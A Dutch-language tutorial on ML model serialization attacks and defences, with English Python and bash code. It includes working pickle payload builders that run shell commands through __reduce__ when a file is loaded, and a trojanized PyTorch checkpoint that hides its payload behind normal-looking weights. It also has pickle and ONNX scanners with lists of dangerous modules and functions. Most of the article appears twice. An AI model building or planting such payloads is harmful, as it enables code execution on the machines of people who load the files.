Model Serialization Attacks

Gemiddeld12 min lezenBijgewerkt op 2026-03-20

Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.

infrastructure serialization pickle supply-chain code-execution

Overzicht

Modelserialisatie — het proces van het opslaan van getrainde modelgewichten en -architectuur naar schijf — is een van de gevaarlijkste aanvalsoppervlakken in het ML-ecosysteem. Het dominante serialisatieformaat voor PyTorch-modellen gebruikt de pickle-module van Python, die fundamenteel onveilig is: het laden van een pickle-bestand kan willekeurige Python-code uitvoeren. Dit betekent dat het downloaden en laden van een model uit een niet-vertrouwde bron gelijkstaat aan het downloaden en uitvoeren van een executable uit die bron.

Deze kwetsbaarheid is niet theoretisch. Onderzoekers hebben herhaaldelijk kwaadaardige modelbestanden op de Hugging Face Hub en andere model repositories aangetoond. Het aanvalsoppervlak is breed omdat het laden van modellen zo routinematig is — datawetenschappers en ML-engineers downloaden regelmatig voorgetrainde modellen en gefinetunede checkpoints, vaak met minimale verificatie. De wijdverbreide cultuur van het delen van modellen via platforms zoals Hugging Face heeft een praktijk genormaliseerd die in de traditionele software-engineering als roekeloos zou worden beschouwd.

Dit artikel behandelt de mechanismen van serialisatieaanvallen over verschillende formaten heen (pickle, ONNX, TensorRT), demonstreert hoe je kwaadaardige modelbestanden maakt en detecteert, en biedt veilige laadpraktijken. De aanvallen koppelen aan MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) en worden behandeld door OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).

Python Pickle: de fundamentele kwetsbaarheid

Hoe pickle werkt

De pickle-module van Python serialiseert Python-objecten door de instructies vast te leggen die nodig zijn om ze te reconstrueren. Bij het unpicklen worden deze instructies uitgevoerd door een virtuele machine. Het cruciale beveiligingsprobleem is dat de instructieset van pickle de REDUCE-opcode bevat, die een willekeurige callable met willekeurige argumenten aanroept. Dit is by design — pickle moet complexe objecten reconstrueren — maar het betekent dat een geprepareerd pickle-bestand os.system, subprocess.Popen of een andere Python-functie kan aanroepen.

import pickle
import io
import struct
 
class PickleExploit:
    """
    Demonstrate how pickle deserialization enables code execution.
    FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
    """
 
    @staticmethod
    def create_malicious_pickle(command: str) -> bytes:
        """
        Create a pickle payload that executes a shell command on load.
        This demonstrates why pickle is fundamentally unsafe for untrusted data.
        """
        # The __reduce__ method tells pickle how to reconstruct the object.
        # By returning (os.system, (command,)), we instruct the unpickler
        # to call os.system(command) when loading.
 
        import os
 
        class Exploit:
            def __reduce__(self):
                return (os.system, (command,))
 
        return pickle.dumps(Exploit())
 
    @staticmethod
    def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
        """
        Create a payload that executes code AND returns legitimate-looking data.
        This is harder to detect because the model appears to load correctly.
        """
        # This payload first executes the command, then returns normal data
        class StealthExploit:
            def __init__(self, data):
                self.data = data
 
            def __reduce__(self):
                # Use exec() to run code, then return the legitimate data
                return (
                    eval,
                    (
                        f"__import__('os').system('{command}') and None or {repr(self.data)}",
                    ),
                )
 
        return pickle.dumps(StealthExploit(legitimate_data))

PyTorch-modelbestanden

torch.save() van PyTorch gebruikt standaard pickle. Een kwaadaardig PyTorch-modelbestand (.pt, .pth of .bin) kan willekeurige code uitvoeren wanneer het wordt geladen met torch.load():

import torch
import torch.nn as nn
from typing import Dict, Any
import os
 
class MaliciousModelDemo:
    """
    Demonstrate malicious PyTorch model file creation.
    FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
    """
 
    @staticmethod
    def create_backdoored_model(
        legitimate_model: nn.Module,
        payload_command: str,
        output_path: str,
    ) -> None:
        """
        Save a model that executes a payload when loaded.
        The model functions normally after loading — the payload is stealthy.
        """
 
        class TrojanizedState(dict):
            """A dict subclass that executes code when unpickled."""
 
            def __init__(self, state_dict: dict, command: str):
                super().__init__(state_dict)
                self._command = command
 
            def __reduce__(self):
                # When unpickled:
                # 1. Execute the payload
                # 2. Return a normal dict (so the model loads correctly)
                return (
                    _reconstruct_with_payload,
                    (dict(self), self._command),
                )
 
        state = TrojanizedState(legitimate_model.state_dict(), payload_command)
        torch.save(state, output_path)
 
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper function used during deserialization."""
    os.system(command)
    return state_dict
 
class SafeModelLoader:
    """Load PyTorch models with safety checks."""
 
    @staticmethod
    def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
        """
        Load a model using weights_only=True (PyTorch 2.0+).
        This restricts unpickling to tensor data only.
        """
        try:
            state_dict = torch.load(
                path,
                map_location=map_location,
                weights_only=True,  # Critical security flag
            )
            return {"success": True, "state_dict": state_dict}
        except Exception as e:
            return {
                "success": False,
                "error": str(e),
                "detail": "Model file may contain non-tensor data (potential exploit)",
            }
 
    @staticmethod
    def scan_pickle_for_dangerous_ops(file_path: str) -> list:
        """
        Scan a pickle file for potentially dangerous operations
        WITHOUT executing them.
        """
        import pickletools
        findings = []
 
        dangerous_modules = {
            "os", "subprocess", "sys", "shutil", "builtins",
            "importlib", "ctypes", "socket", "http", "urllib",
            "requests", "pathlib", "tempfile", "webbrowser",
        }
 
        dangerous_functions = {
            "system", "popen", "exec", "eval", "execfile",
            "compile", "__import__", "getattr", "setattr",
            "globals", "locals", "open", "input",
        }
 
        try:
            with open(file_path, "rb") as f:
                data = f.read()
 
            # Use pickletools to disassemble without executing
            ops = []
            for opcode, arg, pos in pickletools.genops(data):
                ops.append((opcode.name, arg, pos))
 
                if opcode.name in ("GLOBAL", "INST", "STACK_GLOBAL"):
                    if arg and isinstance(arg, str):
                        module = arg.split(".")[0] if "." in arg else arg.split("\n")[0]
                        func = arg.split(".")[-1] if "." in arg else arg.split("\n")[-1] if "\n" in arg else ""
 
                        if module in dangerous_modules or func in dangerous_functions:
                            findings.append({
                                "severity": "critical",
                                "position": pos,
                                "opcode": opcode.name,
                                "reference": arg,
                                "finding": f"Dangerous reference: {arg}",
                            })
 
                elif opcode.name == "REDUCE":
                    findings.append({
                        "severity": "medium",
                        "position": pos,
                        "opcode": "REDUCE",
                        "finding": "REDUCE opcode found — triggers function call during unpickling",
                    })
 
        except Exception as e:
            findings.append({
                "severity": "error",
                "finding": f"Failed to analyze pickle file: {e}",
            })
 
        return findings

SafeTensors: het veilige alternatief

SafeTensors is een serialisatieformaat ontwikkeld door Hugging Face specifiek om de beveiligingsproblemen van pickle aan te pakken. Het slaat alleen tensordata op — vormen, dtypes en ruwe numerieke data — zonder enig mechanisme om uitvoerbare code in te bedden.

SafeTensors-architectuur

Het formaat is eenvoudig:

Een 8-byte headergrootte (little-endian uint64)
Een JSON-header die tensornamen, vormen, dtypes en byte-offsets beschrijft
Ruwe tensordata in aaneengesloten byte-arrays

Er is geen code, geen objectreconstructie, geen aanroep van callables — alleen data.

from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
 
class SafeTensorsManager:
    """Manage model weights using the SafeTensors format."""
 
    @staticmethod
    def convert_pytorch_to_safetensors(
        pytorch_path: str,
        safetensors_path: str,
    ) -> Dict:
        """Convert a PyTorch model file to SafeTensors format."""
        # Load with weights_only=True for safety during conversion
        state_dict = torch.load(
            pytorch_path, map_location="cpu", weights_only=True
        )
 
        # Ensure all values are tensors
        tensor_dict = {}
        for key, value in state_dict.items():
            if isinstance(value, torch.Tensor):
                tensor_dict[key] = value
            else:
                print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
 
        save_file(tensor_dict, safetensors_path)
 
        return {
            "input": pytorch_path,
            "output": safetensors_path,
            "tensors_saved": len(tensor_dict),
            "tensors_skipped": len(state_dict) - len(tensor_dict),
        }
 
    @staticmethod
    def verify_safetensors_integrity(file_path: str) -> Dict:
        """Verify a SafeTensors file's integrity and inspect its contents."""
        path = Path(file_path)
        result = {
            "file": file_path,
            "size_bytes": path.stat().st_size,
            "format_valid": False,
            "tensors": [],
        }
 
        try:
            with safe_open(file_path, framework="pt", device="cpu") as f:
                keys = f.keys()
                for key in keys:
                    tensor = f.get_tensor(key)
                    result["tensors"].append({
                        "name": key,
                        "shape": list(tensor.shape),
                        "dtype": str(tensor.dtype),
                    })
                result["format_valid"] = True
                result["tensor_count"] = len(keys)
        except Exception as e:
            result["error"] = str(e)
 
        return result

Beperkingen van SafeTensors

SafeTensors is geen volledig modelformaat — het slaat alleen tensoren op, niet de modelarchitectuur, optimizer-state of trainingsconfiguratie. Dit betekent:

De modelarchitectuur moet in code worden gedefinieerd en het SafeTensors-bestand levert alleen de gewichten
Custom objecten (learning-rate-schema's, custom layers) kunnen niet worden geserialiseerd
Sommige Hugging Face-modellen leveren nog steeds pickle-bestanden naast SafeTensors voor achterwaartse compatibiliteit

ONNX-beveiligingsoverwegingen

ONNX (Open Neural Network Exchange) is een open formaat voor ML-modellen dat Protocol Buffers-serialisatie gebruikt. Het is veiliger dan pickle omdat het een gedefinieerd schema gebruikt in plaats van willekeurige code-execution. ONNX heeft echter zijn eigen beveiligingszorgen:

Custom operators

ONNX ondersteunt custom operators die gedeelde libraries kunnen laden en uitvoeren:

from typing import Dict, List
from pathlib import Path
 
class ONNXSecurityScanner:
    """Scan ONNX models for security issues."""
 
    def scan_model(self, model_path: str) -> List[Dict]:
        """Scan an ONNX model for security concerns."""
        import onnx
 
        findings = []
        model = onnx.load(model_path)
 
        # Check for custom operators (could load arbitrary shared libraries)
        for node in model.graph.node:
            if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
                findings.append({
                    "severity": "high",
                    "finding": f"Custom operator domain: {node.domain}",
                    "operator": node.op_type,
                    "detail": "Custom operators may load arbitrary native code",
                })
 
        # Check for external data references
        for initializer in model.graph.initializer:
            if initializer.data_location == 1:  # External data
                external_path = ""
                for entry in initializer.external_data:
                    if entry.key == "location":
                        external_path = entry.value
                findings.append({
                    "severity": "medium",
                    "finding": f"External data reference: {external_path}",
                    "detail": "External data could point to a malicious file path",
                })
 
        # Check model metadata for suspicious content
        for prop in model.metadata_props:
            if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
                findings.append({
                    "severity": "medium",
                    "finding": f"Suspicious metadata: {prop.key}",
                    "value_preview": prop.value[:100],
                })
 
        # Check model size vs parameter count (anomalously large models may contain embedded data)
        file_size = Path(model_path).stat().st_size
        param_count = sum(
            1
            for _ in model.graph.initializer
        )
        if param_count > 0:
            bytes_per_param = file_size / param_count
            if bytes_per_param > 1000:  # Unusually large
                findings.append({
                    "severity": "low",
                    "finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
                    "detail": "Model file may contain embedded non-model data",
                })
 
        return findings

Pipeline voor het scannen van modelbestanden

Geautomatiseerd scannen in CI/CD

Integreer het scannen van modelbestanden in de CI/CD van je ML-pipeline:

import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
 
class ModelFileScanner:
    """Comprehensive model file security scanner for CI/CD pipelines."""
 
    SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
    UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
 
    def __init__(self, policy: str = "strict"):
        """
        Args:
            policy: 'strict' blocks all unsafe formats,
                    'warn' logs warnings but allows loading
        """
        self.policy = policy
 
    def scan_directory(self, directory: str) -> Dict:
        """Scan a directory of model files for security issues."""
        path = Path(directory)
        results = {
            "scan_time": datetime.now(timezone.utc).isoformat(),
            "directory": directory,
            "policy": self.policy,
            "files_scanned": 0,
            "findings": [],
            "blocked": [],
            "safe_files": [],
        }
 
        for file_path in path.rglob("*"):
            if not file_path.is_file():
                continue
 
            results["files_scanned"] += 1
            suffix = file_path.suffix.lower()
 
            if suffix in self.UNSAFE_FORMATS:
                finding = {
                    "file": str(file_path),
                    "format": suffix,
                    "severity": "high",
                    "finding": f"Unsafe serialization format: {suffix}",
                }
 
                # Deep scan pickle-based files
                if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
                    try:
                        pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
                            str(file_path)
                        )
                        if pickle_findings:
                            finding["pickle_analysis"] = pickle_findings
                            finding["severity"] = "critical"
                    except Exception as e:
                        finding["scan_error"] = str(e)
 
                results["findings"].append(finding)
                if self.policy == "strict":
                    results["blocked"].append(str(file_path))
 
            elif suffix in self.SAFE_FORMATS:
                results["safe_files"].append(str(file_path))
 
        results["pass"] = len(results["blocked"]) == 0
        return results
 
    def generate_manifest(self, directory: str) -> Dict[str, str]:
        """Generate a hash manifest for all model files in a directory."""
        path = Path(directory)
        manifest = {}
 
        for file_path in sorted(path.rglob("*")):
            if file_path.is_file():
                sha256 = hashlib.sha256()
                with open(file_path, "rb") as f:
                    for chunk in iter(lambda: f.read(8192), b""):
                        sha256.update(chunk)
                relative = str(file_path.relative_to(path))
                manifest[relative] = sha256.hexdigest()
 
        return manifest

Scannen met bestaande tools

Verschillende tools kunnen modelbestanden scannen op kwaadaardige inhoud:

#!/bin/bash
# Model file security scanning pipeline
 
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
    echo "Usage: $0 <model_directory>"
    exit 1
fi
 
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
 
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while read f; do
    echo "  CRITICAL: Pickle file found: $f"
done
 
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while read f; do
    echo "  WARNING: PyTorch file (may use pickle): $f"
done
 
find "$MODEL_DIR" -type f -name "*.safetensors" | while read f; do
    echo "  OK: SafeTensors file: $f"
done
 
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
    find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while read f; do
        echo "  Analyzing: $f"
        fickling --check-safety "$f" 2>/dev/null || echo "    Could not analyze $f"
    done
else
    echo "  fickling not installed. Install with: pip install fickling"
fi
 
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
    modelscan scan -p "$MODEL_DIR"
else
    echo "  modelscan not installed. Install with: pip install modelscan"
fi
 
echo ""
echo "=== Scan Complete ==="

De hierboven genoemde tools zijn echt:

fickling (Trail of Bits): Statische analyse van pickle-bestanden zonder ze uit te voeren. https://github.com/trailofbits/fickling
modelscan (Protect AI): Scant modelbestanden op onveilige operaties over verschillende formaten heen. https://github.com/protectai/modelscan

Formaatvergelijking

Formaat	Risico op code-execution	Ecosysteemondersteuning	Prestaties	Aanbevolen
Pickle (.pkl)	Kritiek — willekeurige code-execution	Universeel Python	Snel	Nooit voor niet-vertrouwde bronnen
PyTorch (.pt/.pth)	Hoog — gebruikt intern pickle	PyTorch-ecosysteem	Snel	Gebruik weights_only=True
SafeTensors	Geen — alleen data	Hugging Face, groeiend	Snel	Ja — voorkeursformaat
ONNX (.onnx)	Laag — custom ops kunnen code laden	Cross-framework	Goed	Ja, met review van custom ops
TensorRT (.plan)	Laag — engine-formaat	NVIDIA-inferentie	Snelst	Ja, voor NVIDIA-deployment
TFLite (.tflite)	Laag — flatbuffers-formaat	Mobiel/edge	Goed	Ja, voor edge-deployment

Verdedigingsaanbevelingen

Gebruik SafeTensors als standaard serialisatieformaat voor alle nieuwe modellen
Gebruik altijd weights_only=True bij het laden van PyTorch-modellen met torch.load()
Scan alle modelbestanden in CI/CD-pipelines vóór deployment met fickling of modelscan
Laad nooit pickle-bestanden uit niet-vertrouwde bronnen — behandel ze als executables
Converteer bestaande pickle-modellen naar SafeTensors-formaat en stoot de pickle-versies af
Verifieer hashes van modelbestanden tegen een vertrouwd manifest vóór het laden
Beperk modeldownloadbronnen tot goedgekeurde registries met geverifieerde publishers
Monitor Hugging Face-modellen op wijzigingen na het uploaden (gebruik commit-hashes, geen branch-refs)

References

Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
Hugging Face SafeTensors — https://github.com/huggingface/safetensors
MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
PyTorch weights_only documentation — https://pytorch.org/docs/stable/generated/torch.load.html

Model Serialization Attacks

Gemiddeld12 min lezenBijgewerkt op 2026-03-20

Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.

infrastructure serialization pickle supply-chain code-execution

Overzicht

Python Pickle: de fundamentele kwetsbaarheid

Hoe pickle werkt

import pickle
import io
import struct
 
class PickleExploit:
    """
    Demonstrate how pickle deserialization enables code execution.
    FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
    """
 
    @staticmethod
    def create_malicious_pickle(command: str) -> bytes:
        """
        Create a pickle payload that executes a shell command on load.
        This demonstrates why pickle is fundamentally unsafe for untrusted data.
        """
        # The __reduce__ method tells pickle how to reconstruct the object.
        # By returning (os.system, (command,)), we instruct the unpickler
        # to call os.system(command) when loading.
 
        import os
 
        class Exploit:
            def __reduce__(self):
                return (os.system, (command,))
 
        return pickle.dumps(Exploit())
 
    @staticmethod
    def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
        """
        Create a payload that executes code AND returns legitimate-looking data.
        This is harder to detect because the model appears to load correctly.
        """
        # This payload first executes the command, then returns normal data
        class StealthExploit:
            def __init__(self, data):
                self.data = data
 
            def __reduce__(self):
                # Use exec() to run code, then return the legitimate data
                return (
                    eval,
                    (
                        f"__import__('os').system('{command}') and None or {repr(self.data)}",
                    ),
                )
 
        return pickle.dumps(StealthExploit(legitimate_data))

PyTorch-modelbestanden

torch.save() van PyTorch gebruikt standaard pickle. Een kwaadaardig PyTorch-modelbestand (.pt, .pth of .bin) kan willekeurige code uitvoeren wanneer het wordt geladen met torch.load():

import torch
import torch.nn as nn
from typing import Dict, Any
import os
 
class MaliciousModelDemo:
    """
    Demonstrate malicious PyTorch model file creation.
    FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
    """
 
    @staticmethod
    def create_backdoored_model(
        legitimate_model: nn.Module,
        payload_command: str,
        output_path: str,
    ) -> None:
        """
        Save a model that executes a payload when loaded.
        The model functions normally after loading — the payload is stealthy.
        """
 
        class TrojanizedState(dict):
            """A dict subclass that executes code when unpickled."""
 
            def __init__(self, state_dict: dict, command: str):
                super().__init__(state_dict)
                self._command = command
 
            def __reduce__(self):
                # When unpickled:
                # 1. Execute the payload
                # 2. Return a normal dict (so the model loads correctly)
                return (
                    _reconstruct_with_payload,
                    (dict(self), self._command),
                )
 
        state = TrojanizedState(legitimate_model.state_dict(), payload_command)
        torch.save(state, output_path)
 
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper function used during deserialization."""
    os.system(command)
    return state_dict
 
class SafeModelLoader:
    """Load PyTorch models with safety checks."""
 
    @staticmethod
    def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
        """
        Load a model using weights_only=True (PyTorch 2.0+).
        This restricts unpickling to tensor data only.
        """
        try:
            state_dict = torch.load(
                path,
                map_location=map_location,
                weights_only=True,  # Critical security flag
            )
            return {"success": True, "state_dict": state_dict}
        except Exception as e:
            return {
                "success": False,
                "error": str(e),
                "detail": "Model file may contain non-tensor data (potential exploit)",
            }
 
    @staticmethod
    def scan_pickle_for_dangerous_ops(file_path: str) -> list:
        """
        Scan a pickle file for potentially dangerous operations
        WITHOUT executing them.
        """
        import pickletools
        findings = []
 
        dangerous_modules = {
            "os", "subprocess", "sys", "shutil", "builtins",
            "importlib", "ctypes", "socket", "http", "urllib",
            "requests", "pathlib", "tempfile", "webbrowser",
        }
 
        dangerous_functions = {
            "system", "popen", "exec", "eval", "execfile",
            "compile", "__import__", "getattr", "setattr",
            "globals", "locals", "open", "input",
        }
 
        try:
            with open(file_path, "rb") as f:
                data = f.read()
 
            # Use pickletools to disassemble without executing
            ops = []
            for opcode, arg, pos in pickletools.genops(data):
                ops.append((opcode.name, arg, pos))
 
                if opcode.name in ("GLOBAL", "INST", "STACK_GLOBAL"):
                    if arg and isinstance(arg, str):
                        module = arg.split(".")[0] if "." in arg else arg.split("\n")[0]
                        func = arg.split(".")[-1] if "." in arg else arg.split("\n")[-1] if "\n" in arg else ""
 
                        if module in dangerous_modules or func in dangerous_functions:
                            findings.append({
                                "severity": "critical",
                                "position": pos,
                                "opcode": opcode.name,
                                "reference": arg,
                                "finding": f"Dangerous reference: {arg}",
                            })
 
                elif opcode.name == "REDUCE":
                    findings.append({
                        "severity": "medium",
                        "position": pos,
                        "opcode": "REDUCE",
                        "finding": "REDUCE opcode found — triggers function call during unpickling",
                    })
 
        except Exception as e:
            findings.append({
                "severity": "error",
                "finding": f"Failed to analyze pickle file: {e}",
            })
 
        return findings

SafeTensors: het veilige alternatief

SafeTensors-architectuur

Het formaat is eenvoudig:

Een 8-byte headergrootte (little-endian uint64)
Een JSON-header die tensornamen, vormen, dtypes en byte-offsets beschrijft
Ruwe tensordata in aaneengesloten byte-arrays

Er is geen code, geen objectreconstructie, geen aanroep van callables — alleen data.

from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
 
class SafeTensorsManager:
    """Manage model weights using the SafeTensors format."""
 
    @staticmethod
    def convert_pytorch_to_safetensors(
        pytorch_path: str,
        safetensors_path: str,
    ) -> Dict:
        """Convert a PyTorch model file to SafeTensors format."""
        # Load with weights_only=True for safety during conversion
        state_dict = torch.load(
            pytorch_path, map_location="cpu", weights_only=True
        )
 
        # Ensure all values are tensors
        tensor_dict = {}
        for key, value in state_dict.items():
            if isinstance(value, torch.Tensor):
                tensor_dict[key] = value
            else:
                print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
 
        save_file(tensor_dict, safetensors_path)
 
        return {
            "input": pytorch_path,
            "output": safetensors_path,
            "tensors_saved": len(tensor_dict),
            "tensors_skipped": len(state_dict) - len(tensor_dict),
        }
 
    @staticmethod
    def verify_safetensors_integrity(file_path: str) -> Dict:
        """Verify a SafeTensors file's integrity and inspect its contents."""
        path = Path(file_path)
        result = {
            "file": file_path,
            "size_bytes": path.stat().st_size,
            "format_valid": False,
            "tensors": [],
        }
 
        try:
            with safe_open(file_path, framework="pt", device="cpu") as f:
                keys = f.keys()
                for key in keys:
                    tensor = f.get_tensor(key)
                    result["tensors"].append({
                        "name": key,
                        "shape": list(tensor.shape),
                        "dtype": str(tensor.dtype),
                    })
                result["format_valid"] = True
                result["tensor_count"] = len(keys)
        except Exception as e:
            result["error"] = str(e)
 
        return result

Beperkingen van SafeTensors

SafeTensors is geen volledig modelformaat — het slaat alleen tensoren op, niet de modelarchitectuur, optimizer-state of trainingsconfiguratie. Dit betekent:

De modelarchitectuur moet in code worden gedefinieerd en het SafeTensors-bestand levert alleen de gewichten
Custom objecten (learning-rate-schema's, custom layers) kunnen niet worden geserialiseerd
Sommige Hugging Face-modellen leveren nog steeds pickle-bestanden naast SafeTensors voor achterwaartse compatibiliteit

ONNX-beveiligingsoverwegingen

Custom operators

ONNX ondersteunt custom operators die gedeelde libraries kunnen laden en uitvoeren:

from typing import Dict, List
from pathlib import Path
 
class ONNXSecurityScanner:
    """Scan ONNX models for security issues."""
 
    def scan_model(self, model_path: str) -> List[Dict]:
        """Scan an ONNX model for security concerns."""
        import onnx
 
        findings = []
        model = onnx.load(model_path)
 
        # Check for custom operators (could load arbitrary shared libraries)
        for node in model.graph.node:
            if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
                findings.append({
                    "severity": "high",
                    "finding": f"Custom operator domain: {node.domain}",
                    "operator": node.op_type,
                    "detail": "Custom operators may load arbitrary native code",
                })
 
        # Check for external data references
        for initializer in model.graph.initializer:
            if initializer.data_location == 1:  # External data
                external_path = ""
                for entry in initializer.external_data:
                    if entry.key == "location":
                        external_path = entry.value
                findings.append({
                    "severity": "medium",
                    "finding": f"External data reference: {external_path}",
                    "detail": "External data could point to a malicious file path",
                })
 
        # Check model metadata for suspicious content
        for prop in model.metadata_props:
            if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
                findings.append({
                    "severity": "medium",
                    "finding": f"Suspicious metadata: {prop.key}",
                    "value_preview": prop.value[:100],
                })
 
        # Check model size vs parameter count (anomalously large models may contain embedded data)
        file_size = Path(model_path).stat().st_size
        param_count = sum(
            1
            for _ in model.graph.initializer
        )
        if param_count > 0:
            bytes_per_param = file_size / param_count
            if bytes_per_param > 1000:  # Unusually large
                findings.append({
                    "severity": "low",
                    "finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
                    "detail": "Model file may contain embedded non-model data",
                })
 
        return findings

Pipeline voor het scannen van modelbestanden

Geautomatiseerd scannen in CI/CD

Integreer het scannen van modelbestanden in de CI/CD van je ML-pipeline:

import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
 
class ModelFileScanner:
    """Comprehensive model file security scanner for CI/CD pipelines."""
 
    SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
    UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
 
    def __init__(self, policy: str = "strict"):
        """
        Args:
            policy: 'strict' blocks all unsafe formats,
                    'warn' logs warnings but allows loading
        """
        self.policy = policy
 
    def scan_directory(self, directory: str) -> Dict:
        """Scan a directory of model files for security issues."""
        path = Path(directory)
        results = {
            "scan_time": datetime.now(timezone.utc).isoformat(),
            "directory": directory,
            "policy": self.policy,
            "files_scanned": 0,
            "findings": [],
            "blocked": [],
            "safe_files": [],
        }
 
        for file_path in path.rglob("*"):
            if not file_path.is_file():
                continue
 
            results["files_scanned"] += 1
            suffix = file_path.suffix.lower()
 
            if suffix in self.UNSAFE_FORMATS:
                finding = {
                    "file": str(file_path),
                    "format": suffix,
                    "severity": "high",
                    "finding": f"Unsafe serialization format: {suffix}",
                }
 
                # Deep scan pickle-based files
                if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
                    try:
                        pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
                            str(file_path)
                        )
                        if pickle_findings:
                            finding["pickle_analysis"] = pickle_findings
                            finding["severity"] = "critical"
                    except Exception as e:
                        finding["scan_error"] = str(e)
 
                results["findings"].append(finding)
                if self.policy == "strict":
                    results["blocked"].append(str(file_path))
 
            elif suffix in self.SAFE_FORMATS:
                results["safe_files"].append(str(file_path))
 
        results["pass"] = len(results["blocked"]) == 0
        return results
 
    def generate_manifest(self, directory: str) -> Dict[str, str]:
        """Generate a hash manifest for all model files in a directory."""
        path = Path(directory)
        manifest = {}
 
        for file_path in sorted(path.rglob("*")):
            if file_path.is_file():
                sha256 = hashlib.sha256()
                with open(file_path, "rb") as f:
                    for chunk in iter(lambda: f.read(8192), b""):
                        sha256.update(chunk)
                relative = str(file_path.relative_to(path))
                manifest[relative] = sha256.hexdigest()
 
        return manifest

Scannen met bestaande tools

Verschillende tools kunnen modelbestanden scannen op kwaadaardige inhoud:

#!/bin/bash
# Model file security scanning pipeline
 
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
    echo "Usage: $0 <model_directory>"
    exit 1
fi
 
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
 
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while read f; do
    echo "  CRITICAL: Pickle file found: $f"
done
 
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while read f; do
    echo "  WARNING: PyTorch file (may use pickle): $f"
done
 
find "$MODEL_DIR" -type f -name "*.safetensors" | while read f; do
    echo "  OK: SafeTensors file: $f"
done
 
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
    find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while read f; do
        echo "  Analyzing: $f"
        fickling --check-safety "$f" 2>/dev/null || echo "    Could not analyze $f"
    done
else
    echo "  fickling not installed. Install with: pip install fickling"
fi
 
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
    modelscan scan -p "$MODEL_DIR"
else
    echo "  modelscan not installed. Install with: pip install modelscan"
fi
 
echo ""
echo "=== Scan Complete ==="

De hierboven genoemde tools zijn echt:

fickling (Trail of Bits): Statische analyse van pickle-bestanden zonder ze uit te voeren. https://github.com/trailofbits/fickling
modelscan (Protect AI): Scant modelbestanden op onveilige operaties over verschillende formaten heen. https://github.com/protectai/modelscan

Formaatvergelijking

Formaat	Risico op code-execution	Ecosysteemondersteuning	Prestaties	Aanbevolen
Pickle (.pkl)	Kritiek — willekeurige code-execution	Universeel Python	Snel	Nooit voor niet-vertrouwde bronnen
PyTorch (.pt/.pth)	Hoog — gebruikt intern pickle	PyTorch-ecosysteem	Snel	Gebruik weights_only=True
SafeTensors	Geen — alleen data	Hugging Face, groeiend	Snel	Ja — voorkeursformaat
ONNX (.onnx)	Laag — custom ops kunnen code laden	Cross-framework	Goed	Ja, met review van custom ops
TensorRT (.plan)	Laag — engine-formaat	NVIDIA-inferentie	Snelst	Ja, voor NVIDIA-deployment
TFLite (.tflite)	Laag — flatbuffers-formaat	Mobiel/edge	Goed	Ja, voor edge-deployment

